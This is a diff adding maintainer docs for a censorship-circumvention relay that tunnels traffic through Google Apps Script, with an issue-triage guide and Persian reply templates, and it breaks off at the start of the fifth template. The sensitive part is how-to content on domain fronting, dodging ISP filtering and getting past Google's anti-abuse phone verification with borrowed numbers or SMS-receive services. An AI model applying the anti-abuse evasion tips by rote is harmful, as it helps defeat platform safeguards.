+- **AIMD per-deployment auto-throttle** — automatically lower `parallel_concurrency` for deployments that hit quota too often. Find the sustainable rate per deployment without manual tuning.
+
+These are queued for v1.8.x batch (~2-4 weeks).
diff --git a/docs/maintainer/references/issue-patterns.md b/docs/maintainer/references/issue-patterns.md
new file mode 100644
index 00000000..87dd77b5
--- /dev/null
+++ b/docs/maintainer/references/issue-patterns.md
@@ -0,0 +1,327 @@
+# Issue patterns
+
+The repo gets the same ~15 issues over and over with different wrappers. Recognizing the pattern fast is most of the maintenance job. Each section below covers: the symptoms users describe, what's actually happening, how to diagnose, and the canonical reply structure.
+
+## Pattern 1: AUTH_KEY mismatch (the v1.8.0 decoy body)
+
+**Symptoms**:
+- `502 Relay error: bad response: no json in: <!DOCTYPE html>...The script completed but did not return anything`
+- v1.8.1+ logs say `got the v1.8.0 bad-auth decoy` (now soft-language in v1.8.3)
+- Issue title often "502 error", "خطای 502", "ارور relay", or "no json in batch response"
+- Often combined with: "MITM mode works but Full mode doesn't" (CodeFull.gs has different AUTH_KEY than Code.gs)
+
+**Root cause**: The `AUTH_KEY` constant in `Code.gs` (or `CodeFull.gs`) on Apps Script doesn't match the `auth_key` field in mhrv-rs `config.json`. Apps Script returns the v1.8.0 decoy HTML.
+
+**The hidden killer**: Apps Script does NOT auto-pickup edits to deployed scripts. Editing `const AUTH_KEY = "..."` in the Apps Script editor and clicking Save does nothing for the deployed version. The user must:
+
+1. Apps Script web editor → **Deploy → Manage Deployments**
+2. Click the deployment → pencil/Edit
+3. Version dropdown → **New version**
+4. Click Deploy
+
+This redeploys with the new AUTH_KEY. Most users skip this and stay on the old version.
+
+**Diagnostic procedure**:
+
+Tell the user to flip `DIAGNOSTIC_MODE = true` at the top of `Code.gs` / `CodeFull.gs`, redeploy as new version, and re-test:
+
+- If they still see the same decoy body → it's NOT AUTH_KEY mismatch (one of the other 5 candidate causes — see `diagnostic-taxonomy.md`)
+- If they see explicit JSON `{"e":"unauthorized"}` → confirmed AUTH_KEY mismatch; align values + redeploy as new version
+
+**Canonical reply structure** (from #414 thread):
+
+1. Confirm the symptom matches the v1.8.x decoy detection
+2. Walk through the 6 candidate causes and explain why AUTH_KEY mismatch is most likely for their case
+3. Detail the redeploy-as-new-version steps with exact UI clicks
+4. Suggest the DIAGNOSTIC_MODE flip as the disambiguator
+5. Close with link to `diagnostic-taxonomy.md`-equivalent context
+
+## Pattern 2: TUNNEL_AUTH_KEY env var name confusion (Full mode)
+
+**Symptoms**:
+- User on Full mode, Docker container set up
+- `docker logs mhrv-tunnel` shows `tunnel_auth_key not set, using defaults`
+- Or: AUTH_KEY mismatch errors in mhrv-rs that the user "definitely" set correctly
+- Often Persian-language issue (matches Iranian VPS user demographic)
+
+**Root cause**: User typed `MHRV_AUTH_KEY` (wrong, this is what some old docs said), `Tunnel` (wrong, partial match), `tunnel_auth_key` (wrong, lowercase), `TUNNEL-AUTH-KEY` (wrong, dash instead of underscore), or skipped the env var entirely.
+
+The literal env var name is **`TUNNEL_AUTH_KEY`** — all uppercase, three words joined by underscores.
+
+**Diagnostic command**:
+```bash
+docker exec mhrv-tunnel env | grep TUNNEL_AUTH_KEY
+```
+
+Should print: `TUNNEL_AUTH_KEY=<their-secret>`. If empty, the env var wasn't set during `docker run`.
+
+**Canonical fix**:
+```bash
+docker stop mhrv-tunnel
+docker rm mhrv-tunnel
+
+docker run -d --name mhrv-tunnel \
+  --restart unless-stopped \
+  -p 8443:8443 \
+  -e TUNNEL_AUTH_KEY="<their-real-secret>" \
+  ghcr.io/therealaleph/mhrv-tunnel-node:latest
+```
+
+Then in `CodeFull.gs`, `const TUNNEL_AUTH_KEY = "<their-real-secret>"` must match. Redeploy as new version.
+
+**Related: port mismatch**. If `docker run` used `-p 8443:8080` or similar mapping, the curl test must use the external port. Check with `docker port mhrv-tunnel`.
+
+## Pattern 3: Iran ISP throttle (#313)
+
+**Symptoms**:
+- 504 timeouts, intermittent connection drops
+- "Worked yesterday, broken today"
+- "Mobile data works but home Wi-Fi doesn't" (or vice versa)
+- TLS handshake timeouts during SNI rotation pool tests
+- All sites slow, not specific to one destination
+
+**Root cause**: Iran's ISP infrastructure (especially TCI/مخابرات, less so MCI/همراه) actively RST-injects mid-stream into TLS connections destined for specific Google IPs. This is targeted at Apps Script outbound, not generic Google access. The throttle comes and goes — sometimes off for hours, sometimes on for days. It was particularly aggressive starting late April 2026.
+
+**Direct curl test** (the gold-standard diagnostic):
+```bash
+curl -L -X POST 'https://script.google.com/macros/s/<deployment_id>/exec' \
+  -H 'Content-Type: application/json' \
+  -d '{"k":"<auth_key>","u":"https://httpbin.org/get","m":"GET"}' \
+  --max-time 30 -w "\ntime: %{time_total}s\n"
+```
+
+Run 5-10 times. If majority timeout/RST → ISP throttle confirmed. If majority succeed → it's mhrv-rs path or config.
+
+**Workarounds** (in roughly the order to try):
+1. Upgrade to latest version (each release tends to add diagnostics + small mitigations)
+2. `disable_padding: true` in config (~25% bandwidth savings, helps under throttle)
+3. Rotate `google_ip` to a different IP from the SNI pool (some IPs filtered, others not, varies by ISP and week)
+4. Switch network (mobile data often less throttled than home Wi-Fi)
+5. Multiple `script_ids` in config — rotation helps when individual deployments are mid-throttle
+6. Full mode + non-Iranian VPS (Hetzner/Contabo/OVH or Iranian-VPS-broker like Parspack selling German VPS)
+
+**Don't promise a fix**. The ISP throttle is upstream of anything we can ship. Acknowledge it, list workarounds, point at #313 as the canonical thread.
+
+## Pattern 4: Apps Script self-loop restriction (Google services blocked)
+
+**Symptoms**:
+- "cloud.google.com gives 403"
+- "Can't access Gmail / Meet / Drive / Colab / Gemini"
+- "google.com loads but mail.google.com doesn't"
+- "YouTube video player shows error" (different — this is SABR cliff #300)
+
+**Root cause**: Google explicitly blocks `UrlFetchApp.fetch()` calls to `*.google.com`, `*.googleapis.com`, `*.gstatic.com`, `*.googleusercontent.com`. This is hardcoded into Google's API to prevent Apps Script from being abused as an internal Google proxy. **No HTTP-relay-on-Apps-Script architecture can fix this.**
+
+**No workaround in apps_script mode**. This is permanent.
+
+**Workaround for users with VPS in Full mode**: dual-routing in xray. Their xray client (or v2ray, etc.) routes Google domains direct from their VPS, everything else through mhrv-rs. See #420 for the canonical thread with config snippets.
+
+**Canonical reply**: explain the architectural limit, list the affected sites, point at #420 for the dual-VPS workaround. Close as duplicate of #420 if it's a clean duplicate.
+
+## Pattern 5: SABR cliff (#300) — YouTube video doesn't play
+
+**Symptoms**:
+- "YouTube loads but video doesn't play"
+- "This content isn't available"
+- "Playback error" / "An error occurred"
+- "Short videos work, long ones don't"
+
+**Root cause**: Apps Script's 30-second response cap. YouTube's SABR streaming protocol expects long-lived response streams. After ~30s the stream gets cut by Apps Script and the video player errors out. Page HTML/JS loads fine (small, fits in window). Video stream doesn't.
+
+**Workarounds**:
+- Short videos (<1 min) often work
+- Lowest quality (144p/240p) sometimes squeaks past
+- YouTube web in Chrome/Firefox (browsers use user trust store on Android, YouTube app doesn't) > YouTube app
+- NewPipe (Android, F-Droid) sometimes works better than official app
+- Full mode + VPS (definitive — bytes flow through TCP tunnel, not Apps Script's response window)
+
+v1.9.0 xmux roadmap aims to mitigate by splitting streams across multiple deployments. Won't fully resolve.
+
+**Canonical reply**: explain SABR cliff, list workarounds, close as duplicate of #300 if pure duplicate.
+
+## Pattern 6: Android user trust store
+
+**Symptoms**:
+- "Browser works but YouTube/Telegram/Instagram apps don't"
+- "VPN is on but apps don't go through mhrv-rs"
+- "How do I make Gmail app work?"
+
+**Root cause**: Android has two CA trust stores — system (factory-installed CAs) and user (user-installed CAs via Settings → Security → Install certificate). Since Android 7.0 (2016), most apps default to system-only. The mhrv-rs MITM CA installs to user trust store; system trust requires root.
+
+**Apps that work via mhrv-rs on Android**: Chrome, Firefox, Edge, Brave (browsers explicitly opt in to user trust). Most desktop-class apps that delegate to system browser.
+
+**Apps that don't work**: YouTube app, Gmail app, Maps, Instagram, Twitter/X, banking apps, any app shipped with strict TLS pinning. They use system trust + don't see mhrv-rs.
+
+**Workarounds**:
+- Use web versions (`youtube.com` in Chrome instead of YouTube app)
+- Root + Magisk + MagiskTrustUserCerts module migrates user CA to system
+- Full mode + VPS (bytes don't flow through MITM, so trust isn't needed for arbitrary apps; v2ray/xray on VPS handles routing)
+
+**Canonical reply**: explain user/system trust store distinction, list which apps work, give the three workarounds. This is FAQ-tier — should eventually be in `docs/faq/android.md`.
+
+## Pattern 7: Cloudflare CAPTCHA / 403
+
+**Symptoms**:
+- "Most CF-protected sites block me"
+- "ChatGPT shows captcha I can't solve"
+- "Cloudflare checking your browser..." stuck
+
+**Root cause**: All mhrv-rs traffic exits via Google data center IPs (Apps Script's outbound). Cloudflare's bot detection flags traffic from Google IPs to consumer-facing sites as suspicious — looks like a scraper/bot, not a person. Result: aggressive CAPTCHA, sometimes outright 403.
+
+**Workarounds** (limited):
+- Solve interactive CAPTCHA when shown — the resulting token works for hours
+- Different browser fingerprints sometimes pass (Brave, Tor)
+- Full mode + VPS — VPS exits with its own (residential-adjacent) IP, often not flagged
+- Cloudflare WARP integration is on the v1.9.x roadmap (#309) but feasibility uncertain
+
+**Canonical reply**: explain why (Google IP exit), list workarounds, point at #382 (canonical Cloudflare thread) and #309 (WARP roadmap).
+
+## Pattern 8: Apps Script account suspension / phone-required
+
+**Symptoms**:
+- "Action required" notifications on Google account
+- "Phone number must be added"
+- Deployment intermittently returns Persian Workspace landing HTML (`<html lang="fa" dir="rtl">پردازش کلمه وب...`)
+- Sometimes resolves on its own; sometimes escalates to suspension
+
+**Root cause**: Google's anti-abuse system flags new Google accounts (especially phone-less ones) within hours of deploying automation-pattern code. The progression is: warning → soft restriction (Workspace landing HTML on UrlFetchApp calls) → full suspension.
+
+**Workarounds**:
+1. Add a phone number to the account (most reliable). Iranian phones often filtered by Google's verification; user might need a friend's foreign number, TextNow, paid SMS-receive service, or shared phone
+2. Use established phone-verified accounts (own main Gmail, family/friends' main accounts) — multi-year-old accounts with normal usage history are very rarely flagged
+3. Workflow #325 — community shared deployments (one user with stable account hosts the deployment, others use the deployment ID + shared AUTH_KEY)
+
+**Risk levels** (approximate, from observed reports):
+- Phone-verified personal Gmail, single deployment, light use → low risk
+- Phone-verified, multiple deployments under same account → medium risk
+- New no-phone account, any usage → high risk
+- Old established account, single deployment → very low risk
+
+No confirmed cases of full Google account ban (Gmail deletion, Drive loss). Suspensions are scoped to Apps Script + UrlFetchApp.
+
+## Pattern 9: Telegram / VoIP / "app doesn't work in Full mode"
+
+**Symptoms**:
+- "Can I add Telegram support?"
+- "WhatsApp/Skype voice calls don't work"
+- "Need a port for Telegram"
+
+**Root cause**: Telegram uses MTProto (a custom non-HTTP protocol). WhatsApp/Skype/FaceTime voice/video use WebRTC (UDP STUN/TURN). Apps Script's `UrlFetchApp` is HTTP/HTTPS only — it **cannot carry UDP or non-HTTP protocols by design.**
+
+**Workarounds**:
+- **Telegram messaging**: web.telegram.org through mhrv-rs Chrome (HTTPS, works)
+- **Telegram MTProto proxy**: use a public MTProto proxy from Telegram channels (free, unreliable) or self-host on VPS
+- **Voice/video calls**: only via Full mode + VPS + xray UDP-enabled routing — bytes route direct from VPS to upstream, not through Apps Script
+
+Architectural ceiling — can't be fixed in mhrv-rs core.
+
+## Pattern 10: Config file confusion (config.json vs scan_config.json)
+
+**Symptoms**:
+- "I followed instructions but it doesn't import the config"
+- User pastes a config that has `google_ips`, `max_ips_to_scan`, `scan_batch_size`, `google_ip_validation` fields
+- Says "the program doesn't pick up my config"
+
+**Root cause**: User confused `config.json` (main runtime config — `script_ids`, `auth_key`, `google_ip`, `mode`, etc.) with `scan_config.json` (input for `mhrv-rs scan-ips` diagnostic command — Google IP discovery).
+
+**Fix**: explain the two files, point at `config.example.json` in repo root for the right template.
+
+Common related typos:
+- `script_id` (singular) instead of `script_ids` (plural array) — mhrv-rs parses as 0 deployments and falls back
+- `mode: "fullmode"` or `"full_mode"` instead of `"full"` (or `"apps_script"`)
+
+## Pattern 11: Windows OpenGL renderer fail
+
+**Symptoms**:
+- `Error: Glutin(Error { ... NotSupported("extension to create ES context with wgl is not present") })`
+- `Error: Wgpu(NoSuitableAdapterFound)`
+- run.bat fails twice (Glow then wgpu fallback) and exits
+
+**Root cause**: User's Windows lacks OpenGL 2.0+ AND lacks DX12/Vulkan-compatible GPU. Causes: old GPU (Intel HD 2500/3000-era), running in VM without GPU acceleration, RDP session, missing/corrupt graphics drivers.
+
+**Workaround**: use the CLI binary `mhrv-rs.exe` directly. Put `config.json` in the same folder, double-click `mhrv-rs.exe`, set browser proxy to `127.0.0.1:8086`. Same functionality, no UI.
+
+v1.8.x roadmap: improve `run.bat` to auto-fallback to CLI when both UI renderers fail.
+
+## Pattern 12: VPS / Full mode setup questions
+
+**Symptoms**:
+- "How do I set up VPS?"
+- "Does the VPS need to be reachable from Iran?"
+- "Which provider should I buy?"
+- "Step-by-step please"
+
+**Canonical answer**: VPS does NOT need to be reachable from Iran (Apps Script proxies the path). Recommended providers:
+
+- **Direct purchase from Iran**: difficult — Hetzner needs VAT ID
+- **Iranian reseller**: Parspack ([parspack.com/vps](https://parspack.com/vps)), Iranserver, Hostiran sell German VPS via Iranian payment with mark-up (~20-40% over direct)
+- **Outside Iran**: Hetzner Falkenstein DE, Contabo DE, OVH SYS — direct euro/dollar payment
+
+Specs: 1 vCPU, 1 GB RAM, 25 GB SSD, 50+ Mbps unmetered → ~$3-5/month direct or ~250-500k toman/month via reseller for personal use. For 5+ devices + Instagram smooth: 2-4 GB RAM, 100 Mbps unmetered.
+
+Setup walkthrough: see `tunnel-node/README.md` and `tunnel-node/README.fa.md` (Persian).
+
+## Pattern 13: Iranian VPS provider bandwidth-cap appliance
+
+**Symptoms** (rare but observed):
+- Persian "exceeded bandwidth quota" HTML response from user's own tunnel-node URL
+- Mixed success/failure on same `script_id`
+
+**Root cause** (provisional — confirmed only when VPS is on Iranian provider): Iranian VPS providers enforce monthly bandwidth quotas at the upstream router/load-balancer layer. When tripped, they intercept traffic and serve a Persian quota landing page **upstream** of the user's Docker container. Container itself never sees the request during quota events.
+
+**Note**: Several users have reported this where the VPS turned out to be at Hetzner DE (not Iranian) — in which case the Persian body is actually Apps Script's own localized soft-quota response (cause #5 in the diagnostic taxonomy). Always confirm the VPS provider before assuming.
+
+**Workarounds**:
+1. Upgrade plan if provider has a higher tier
+2. Move to non-Iranian VPS (Hetzner/Contabo/OVH unmetered)
+3. Client-side bandwidth optimizations: `disable_padding`, lower `parallel_concurrency`, DNS bypass (v1.8.3+)
+
+## Pattern 14: Account locale → Persian Apps Script error pages
+
+**Symptoms**:
+- Apps Script's response body comes back as Persian HTML (Workspace landing page or quota page)
+- User on Hetzner/non-Iranian VPS
+- Their Google account is set to fa-IR locale OR request originates from Iranian IP through some leg
+
+**Root cause**: Apps Script localizes its system error/placeholder pages based on the deploying account's locale and (sometimes) request-origin IP. Persian-locale account → Persian error pages. This is independent of the user's geographic location running mhrv-rs.
+
+**Disambiguator**: `DIAGNOSTIC_MODE = true` in Code.gs. If still see Persian body → it's NOT AUTH_KEY mismatch (which gets replaced with explicit JSON in diagnostic mode). It's Apps Script's own quota/state response.
+
+In the diagnostic taxonomy this pattern maps to cause 5 ("Persian quota body" for healthy deployments under quota tear) and, when the deployment owner's account is flagged, to cause 6 ("Workspace landing HTML for account-flagged deployments").
+
+## Pattern 15: Download large files / IDM workaround
+
+**Symptoms**:
+- "Downloads stick at 1-10 MB"
+- "Need to download a 1 GB file, IDM gets partial only"
+
+**Root cause**: 30s response cliff again. For 10 MB files at typical Apps Script throughput, 30s is enough. For 1 GB, would need 200+ seconds — hopeless.
+
+**Workarounds**:
+- IDM's multi-segment download with 5 MB segments — each segment fits inside 30s window
+- Full mode + VPS — bytes flow through TCP tunnel, not constrained
+- v1.8.x roadmap: range-aware splicing in Code.gs to natively support `Range:` requests
+
+## Quick triage table
+
+When a new issue lands, scan for these keywords to map fast:
+
+| Keywords | Pattern |
+|----------|---------|
+| `502`, `decoy`, `no json in batch`, `script completed but did not return` | 1 (AUTH_KEY mismatch) |
+| `tunnel_auth_key not set`, `MHRV_AUTH_KEY`, `Tunnel_Auth_Key`, `docker logs mhrv-tunnel` | 2 (TUNNEL_AUTH_KEY confusion) |
+| `504`, `timeout`, `Apps Script unresponsive`, `Connection reset`, `RST`, "yesterday worked" | 3 (Iran ISP throttle #313) |
+| `cloud.google.com`, `colab`, `gmail`, `meet`, `gemini`, `drive` not loading | 4 (self-loop restriction → #420) |
+| `YouTube video doesn't play`, `This content isn't available`, `playback error` | 5 (SABR cliff → #300) |
+| Android, `Gmail app`, `YouTube app`, `Telegram`, "browser works but apps don't" | 6 (user trust store) |
+| `Cloudflare`, `captcha`, `403 Forbidden`, "checking your browser" | 7 (CF bot detection → #382) |
+| `Google account`, `phone required`, `action required`, `suspension`, `Workspace landing` | 8 (account flag) |
+| `Telegram support`, `WhatsApp call`, `Skype`, `voice call`, `video call` | 9 (UDP/MTProto architectural) |
+| Config has `google_ips`, `scan_batch_size`, `max_ips_to_scan` | 10 (scan_config confusion) |
+| `egui_glow`, `OpenGL`, `wgl`, `Wgpu(NoSuitableAdapterFound)`, `run.bat` | 11 (Windows OpenGL → CLI) |
+| `VPS`, `Hetzner`, `Parspack`, `setup help`, "step by step VPS" | 12 (Full mode setup) |
+| `سهمیه پهنای باند`, `bandwidth quota`, Iranian VPS provider | 13 (provider appliance) |
+| Persian HTML body in error log + non-Iranian VPS | 14 (account locale) |
+| `IDM`, `download stuck`, `large file`, `1 GB download` | 15 (range/cliff) |
+
+If the issue doesn't fit any pattern, it's worth reading carefully — these are the genuine new bugs.
diff --git a/docs/maintainer/references/persian-templates.md b/docs/maintainer/references/persian-templates.md
new file mode 100644
index 00000000..932dcd76
--- /dev/null
+++ b/docs/maintainer/references/persian-templates.md
@@ -0,0 +1,439 @@
+# Persian reply templates
+
+These are starting templates for the highest-frequency Persian-language replies. Don't use them verbatim — adapt to the specific user's log lines, config, and report. They exist to prevent re-deriving common phrasings each time and to keep the project's Persian voice consistent across replies.
+
+The conventions throughout assume:
+- Polite professional register (`می‌فرمایید` over `می‌گی`, full pronouns)
+- Half-spaces (ZWNJ, `‌`) in compound words
+- Latin-script for technical terms inline with Persian particles
+- Persian numerals optional in prose (`۲۰،۰۰۰` or `20,000` both fine — match the user)
+- Code blocks always in Latin
+- Reply marker (Latin) at end
+
+## Template 1: AUTH_KEY mismatch (with redeploy-as-new-version walkthrough)
+
+For users showing the v1.8.x decoy detection log line:
+
+```markdown
+این `502` با body `The script completed but did not return anything` دقیقاً همان pattern decoy detection است که در v1.8.x اضافه شد. شش علت ممکن (per v1.8.3 taxonomy) داره ولی محتمل‌ترین برای case شما **AUTH_KEY mismatch** است.
+
+**نکته بسیار مهم که اکثر کاربران نمی‌دونند:**
+
+اگر AUTH_KEY رو در Code.gs ویرایش کرده‌اید **بعد از deployment اولیه**، Apps Script اتومات edit رو در deployment موجود pick-up نمی‌کنه. لازمه که **redeploy as new version** کنید:
+
+1. پروژه رو در Apps Script web editor باز کنید
+2. Deploy → **Manage Deployments** (نه Deploy → New deployment)
+3. روی **deployment موجود** کلیک کنید → پنسیل (Edit)
+4. در dropdown **Version** → **New version** انتخاب کنید (نه "Head")
+5. Description بنویسید (مثلاً "AUTH_KEY update")
+6. **Deploy** کلیک کنید
+
+URL deployment همون می‌مونه ولی الان Apps Script کد جدید با AUTH_KEY جدید رو serve می‌کنه.
+
+**Diagnostic سریع برای تأیید AUTH_KEY mismatch:**
+
+در بالای Code.gs این خط رو پیدا کنید:
+
+`const DIAGNOSTIC_MODE = false;`
+
+تغییر دهید به:
+
+`const DIAGNOSTIC_MODE = true;`
+
+سپس **redeploy as new version** کنید (مثل بالا). سپس test:
+
+- اگر **هنوز decoy body همون** برمی‌گرده → علت **NOT** AUTH_KEY mismatch است (یکی از سایر ۵ علت)
+- اگر **JSON `{"e":"unauthorized"}` صریح** برمی‌گرده → بله، AUTH_KEY mismatch — fix رو با aligning AUTH_KEY در config.json با Code.gs انجام دهید + redeploy as new version
+
+بعد از debug کامل، DIAGNOSTIC_MODE رو به `false` برگردونید + redeploy. در production این flag رو false نگه می‌داریم چون decoy body anti-fingerprinting protection محسوب می‌شه.
+
+نتیجه DIAGNOSTIC_MODE flip + پیغام دقیق error بعد از redeploy رو share کنید + می‌تونیم narrow کنیم.
+
+---
+<sub>[reply via Anthropic Claude | reviewed by @therealaleph]</sub>
+```
+
+## Template 2: TUNNEL_AUTH_KEY exact spelling
+
+For users showing `tunnel_auth_key not set, using defaults` in `docker logs mhrv-tunnel`:
+
+```markdown
+مشکلت یادم نرفته! `tunnel_auth_key not set, using defaults` در log‌ها یعنی **اسم env variable هنوز اشتباه است**. می‌خوام دقیق‌تر توضیح بدم چون اسم env vars خیلی sensitive هست:
+
+**اسم env variable باید دقیقاً این باشد** (نه چیز دیگه‌ای، نه شبیه به این):
+
+```
+TUNNEL_AUTH_KEY
+```
+
+- **همه‌ش حروف بزرگ**
+- **با underscore (`_`) بین کلمات** — نه فاصله، نه dash
+- **سه قسمت**: `TUNNEL` + `_` + `AUTH` + `_` + `KEY`
+
+**اشتباهات رایج که `tunnel_auth_key not set` می‌ده:**
+
+| اشتباه | چرا کار نمی‌کنه |
+|--------|-----------------|
+| `Tunnel` یا `tunnel` (تنها) | اسم کامل نیست، tunnel-node این رو نمی‌خونه |
+| `Tunnel_Auth_Key` یا `tunnel_auth_key` (lowercase/mixed) | env vars در Linux/Docker case-sensitive هستن |
+| `TUNNEL-AUTH-KEY` (با dash) | باید underscore باشه نه dash |
+| `MHRV_AUTH_KEY` | اشتباه قدیمی، tunnel-node این رو نمی‌خونه |
+
+**دستور docker run درست — کپی exact:**
+
+```bash
+ssh root@your-vps-ip
+docker stop mhrv-tunnel
+docker rm mhrv-tunnel
+
+docker run -d --name mhrv-tunnel \
+  --restart unless-stopped \
+  -p 8443:8443 \
+  -e TUNNEL_AUTH_KEY="your-secret-here" \
+  ghcr.io/therealaleph/mhrv-tunnel-node:latest
+```
+
+به‌جای `your-secret-here` همون مقداری که در CodeFull.gs گذاشتید بنویسید.
+
+**verify بعد از start:**
+
+```bash
+docker exec mhrv-tunnel env | grep TUNNEL_AUTH_KEY
+```
+
+اگر خروجی این باشه:
+```
+TUNNEL_AUTH_KEY=your-secret-here
+```
+درسته. اگر هیچ خروجی نداد یا خروجی متفاوت بود، دستور `docker run` با اسم اشتباه اجرا شده.
+
+نتیجه + خروجی `docker exec` رو share کنید + اگر همچنان مشکل بود narrow می‌کنیم.
+
+---
+<sub>[reply via Anthropic Claude | reviewed by @therealaleph]</sub>
+```
+
+## Template 3: #313 ISP throttle (for "504 timeout" reports)
+
+For users with intermittent timeouts that look like ISP throttle:
+
+```markdown
+این الگو با [#313](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/313) (Iran ISP throttle Apps Script outbound) match می‌کنه. throttle این هفته نوسانی بوده — گاهی ساعتی off می‌شه، گاهی روزی.
+
+**Diagnostic سریع — direct curl test:**
+
+```bash
+curl -L -X POST 'https://script.google.com/macros/s/YOUR_DEPLOYMENT_ID/exec' \
+  -H 'Content-Type: application/json' \
+  -d '{"k":"YOUR_AUTH_KEY","u":"https://httpbin.org/get","m":"GET"}' \
+  --max-time 30 -w "\ntime: %{time_total}s\n"
+```
+
+اجرا کنید ۵-۱۰ بار. اگر:
+
+- اکثرشون timeout/RST می‌گیرن = #313 ISP throttle (شبکه شما Apps Script رو filter می‌کنه)
+- اکثرشون JSON برمی‌گردونن = مشکل از path mhrv-rs است (config، auth_key، یا غیره)
+
+**Workaround احتمالی برای ISP throttle:**
+
+۱. **به نسخه v1.8.3 (الان موجود) ارتقا دهید:**
+   - دانلود از <https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases/tag/v1.8.3> یا <https://t.me/mhrv_rs>
+   - شامل DoH bypass، H1 keepalive، 6-cause error detection
+
+۲. **`disable_padding: true` در config:**
+
+```json
+{
+  "disable_padding": true,
+  ...
+}
+```
+
+~۲۵٪ bandwidth کم‌تر، در شبکه‌های throttle شده compounds رو کم می‌کنه.
+
+۳. **`google_ip` متفاوت تست کنید** — default `216.239.38.120` ممکنه روی شبکه شما filter شده + یکی دیگه از pool reachable است. لیست pool در `src/domain_fronter.rs` `DEFAULT_GOOGLE_SNI_POOL`.
+
+۴. **شبکه عوض کنید** — همراه/MCI کم‌ترین throttle داره معمولاً. اگر روی Wi-Fi مخابرات هستید، با موبایل دیتا تست کنید.
+
+۵. **چند `script_ids` داشته باشید** — اگر یک deployment quota tear گرفته یا throttle شده، rotation کار می‌کنه. حداقل ۳-۵ deployment.
+
+۶. **اگر VPS دارید** — Full mode رو امتحان کنید (راهنما [tunnel-node README فارسی](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/tunnel-node/README.fa.md)). ISP throttle Apps Script outbound روی Full mode اعمال نمی‌شه.
+
+نتیجه v1.8.3 + curl test + log رو share کنید + می‌تونیم narrow کنیم.
+
+---
+<sub>[reply via Anthropic Claude | reviewed by @therealaleph]</sub>
+```
+
+## Template 4: VPS setup (Full mode) walkthrough
+
+For "how do I set up VPS?" questions:
+
+```markdown
+**Q: آیا VPS باید مستقیم از Iran قابل دسترسی باشه؟**
+
+**کوتاه: نه.** VPS لازم نیست از Iran direct reachable باشه. این مزیت architectural mhrv-rs Full mode است.
+
+مسیر traffic:
+
+```
+Phone (Iran) → mhrv-rs client (Iran) → Apps Script (via Google IP fronting) →
+                                       Apps Script's UrlFetchApp →
+                                       VPS tunnel-node container →
+                                       upstream internet
+```
+
+دقت کنید: **مسیر از Iran به VPS از طریق Apps Script می‌گذره**. پس:
+
+- Iran ISP فقط TLS traffic به Google IPها می‌بینه (`216.239.38.120` و سایر) — مثل HTTPS عادی به Google
+- Apps Script (در Google data center، US/EU) به VPS شما call می‌کنه
+- VPS شما فقط traffic از Google IP می‌گیره (Apps Script's outbound)
+
+پس حتی اگر VPS IP از Iran ISP filter شده باشه، **مهم نیست** چون هیچ Iran connection direct به VPS نمی‌ره.
+
+**Setup گام‌به‌گام:**
+
+**۱. خرید VPS:**
+
+- اگر می‌توانید Hetzner direct: ~€۴.۵۰/ماه از Falkenstein DE — [hetzner.com/cloud](https://www.hetzner.com/cloud)
+- اگر VAT ID نیست: Parspack ([parspack.com/vps](https://parspack.com/vps)) واسطه‌ی آلمانی فروش می‌کنه با ~۲۵۰-۵۰۰ هزار تومان/ماه
+
+specs توصیه شده:
+- شخصی: 1 vCPU، 1 GB RAM، 25 GB SSD، 50+ Mbps unmetered
+- خانوادگی (۵+ device + Instagram smooth): 2-4 GB RAM، 100 Mbps unmetered
+
+**۲. Docker install:**
+
+```bash
+ssh root@your-vps-ip
+apt update && apt upgrade -y
+apt install -y docker.io
+systemctl enable --now docker
+docker --version  # verify
+```
+
+**۳. tunnel-node container run:**
+
+```bash
+docker run -d --name mhrv-tunnel \
+  --restart unless-stopped \
+  -p 8443:8443 \
+  -e TUNNEL_AUTH_KEY="your-secret-here" \
+  ghcr.io/therealaleph/mhrv-tunnel-node:latest
+```
+
+**اسم env var دقیقاً `TUNNEL_AUTH_KEY` است** — uppercase، با underscore. هر deviation در default `changeme` می‌افته + بعداً mismatch می‌سازه.
+
+برای ساخت secret تصادفی:
+```bash
+openssl rand -hex 32
+```
+
+**۴. firewall:**
+
+```bash
+sudo ufw allow 8443/tcp
+sudo ufw allow ssh
+sudo ufw enable
+```
+
+**۵. verify direct از خود VPS:**
+
+```bash
+curl -X POST 'http://localhost:8443/tunnel' \
+  -H 'Content-Type: application/json' \
+  -d '{"k":"YOUR_TUNNEL_SECRET","op":"connect","host":"www.google.com","port":443}' \
+  --max-time 10
+```
+
+باید JSON success برگرده. اگر نه، tunnel-node container start نشده.
+
+**۶. CodeFull.gs setup:**
+
+در [`assets/apps_script/CodeFull.gs`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/assets/apps_script/CodeFull.gs) محتوا رو copy کنید + در script.google.com یک پروژه جدید ایجاد کنید + paste کنید.
+
+بالای فایل تنظیم کنید:
+
+```js
+const AUTH_KEY = "your-mhrv-auth-key";
+const TUNNEL_URL = "http://YOUR_VPS_IP:8443/tunnel";
+const TUNNEL_AUTH_KEY = "your-tunnel-secret-here";  // match با docker run -e
+```
+
+سپس **Deploy → New deployment → Web App → Execute as: Me + Who has access: Anyone → Deploy**. URL deployment رو copy کنید + ID بخشش رو بردارید.
+
+**۷. mhrv-rs config:**
+
+```json
+{
+  "mode": "full",
+  "auth_key": "your-mhrv-auth-key",
+  "script_ids": ["YOUR_DEPLOYMENT_ID"]
+}
+```
+
+**`script_ids` plural با s** — این یک typo رایجه که config رو 0-deployment می‌کنه.
+
+**۸. Connect + verify:**
+
+mhrv-rs رو start کنید + log باید نشون بده:
+
+```
+INFO batch: 1 ops → AKfyc..., rtt=Xs    ← good
+INFO tunnel session abc1234... opened for ...:443    ← good
+```
+
+اگر `ERROR batch failed: got the v1.8.0 bad-auth decoy` می‌گیرید، AUTH_KEY mismatch است (گام ۶ رو check کنید).
+
+اگر `Connection refused` به VPS می‌گیرید، firewall بسته است (گام ۴ رو بررسی کنید).
+
+برای راهنمای فارسی همراه با تصاویر، [tunnel-node README فارسی](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/tunnel-node/README.fa.md) رو ببینید.
+
+اگر در گامی fail کرد، error log + خروجی command رو share کنید + می‌تونیم narrow کنیم.
+
+---
+<sub>[reply via Anthropic Claude | reviewed by @therealaleph]</sub>
+```
+
+## Template 5: Account suspension / phone-required (for "action required" reports)
+
+For users reporting Google account flag or "action required" notifications:
+
+```markdown
